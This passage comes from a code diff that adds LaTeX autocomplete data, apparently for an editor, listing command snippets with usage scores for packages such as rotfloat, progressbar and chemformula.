'\\sfdefault', + meta: 'mathastext-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'mathastext-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'mathastext-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\mathrm{}', + snippet: '\\mathrm{$1}', + meta: 'mathastext-cmd', + score: 0.19117752976172653, + }, + ], + movie15: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'movie15-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'movie15-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'movie15-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'movie15-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'movie15-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'movie15-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'movie15-cmd', + score: 0.0018957469739775527, + }, + ], + refstyle: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'refstyle-cmd', + score: 0.00037306820619479756, + }, + ], + 'pst-3d': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-3d-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-3d-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-3d-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-3d-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-3d-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-3d-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-3d-cmd', + score: 0.006520475264573554, + }, + ], + rotfloat: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'rotfloat-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'rotfloat-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'rotfloat-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'rotfloat-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'rotfloat-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'rotfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'rotfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'rotfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'rotfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'rotfloat-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rotfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'rotfloat-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rotfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'rotfloat-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'rotfloat-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'rotfloat-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'rotfloat-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'rotfloat-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'rotfloat-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'rotfloat-cmd', + score: 0.004719094298848707, + }, + ], + progressbar: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'progressbar-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'progressbar-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'progressbar-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'progressbar-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'progressbar-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'progressbar-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'progressbar-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'progressbar-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'progressbar-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'progressbar-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'progressbar-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'progressbar-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'progressbar-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'progressbar-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'progressbar-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'progressbar-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'progressbar-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'progressbar-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'progressbar-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'progressbar-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'progressbar-cmd', + score: 0.008565354665444157, + }, + ], + pagecolor: [ + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pagecolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pagecolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pagecolor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pagecolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pagecolor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pagecolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pagecolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pagecolor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pagecolor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pagecolor-cmd', + score: 0.021170869458413965, + }, + ], + gb4e: [ + { + caption: '\\ex', + snippet: '\\ex', + meta: 'gb4e-cmd', + score: 0.00916111174873264, + }, + ], + ESIEEcv: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'ESIEEcv-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'ESIEEcv-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'ESIEEcv-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'ESIEEcv-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'ESIEEcv-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ESIEEcv-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'ESIEEcv-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'ESIEEcv-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'ESIEEcv-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'ESIEEcv-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'ESIEEcv-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ESIEEcv-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'ESIEEcv-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'ESIEEcv-cmd', + score: 0.018615449342361392, + }, + ], + ftnright: [ + { + caption: '\\footnotesize', + snippet: '\\footnotesize', + meta: 'ftnright-cmd', + score: 0.2038592081252624, + }, + { + caption: '\\footnotesize{}', + snippet: '\\footnotesize{$1}', + meta: 'ftnright-cmd', + score: 0.2038592081252624, + }, + ], + chemformula: [ + { + caption: '\\ch{}', + snippet: '\\ch{$1}', + meta: 'chemformula-cmd', + score: 0.0013276105116845872, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'chemformula-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'chemformula-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\nicefrac{}{}', + snippet: '\\nicefrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0018011350423659288, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'chemformula-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'chemformula-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'chemformula-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'chemformula-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'chemformula-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'chemformula-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'chemformula-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'chemformula-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'chemformula-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'chemformula-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'chemformula-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'chemformula-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'chemformula-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'chemformula-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'chemformula-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'chemformula-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'chemformula-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'chemformula-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'chemformula-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'chemformula-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'chemformula-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'chemformula-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'chemformula-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'chemformula-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'chemformula-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'chemformula-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'chemformula-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'chemformula-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'chemformula-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'chemformula-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'chemformula-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'chemformula-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'chemformula-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'chemformula-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'chemformula-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'chemformula-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'chemformula-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'chemformula-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'chemformula-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'chemformula-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'chemformula-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'chemformula-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'chemformula-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'chemformula-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'chemformula-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'chemformula-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'chemformula-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'chemformula-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'chemformula-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'chemformula-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'chemformula-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'chemformula-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'chemformula-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chemformula-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chemformula-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chemformula-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemformula-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chemformula-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chemformula-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chemformula-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chemformula-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chemformula-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemformula-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chemformula-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.029302172361548254, + 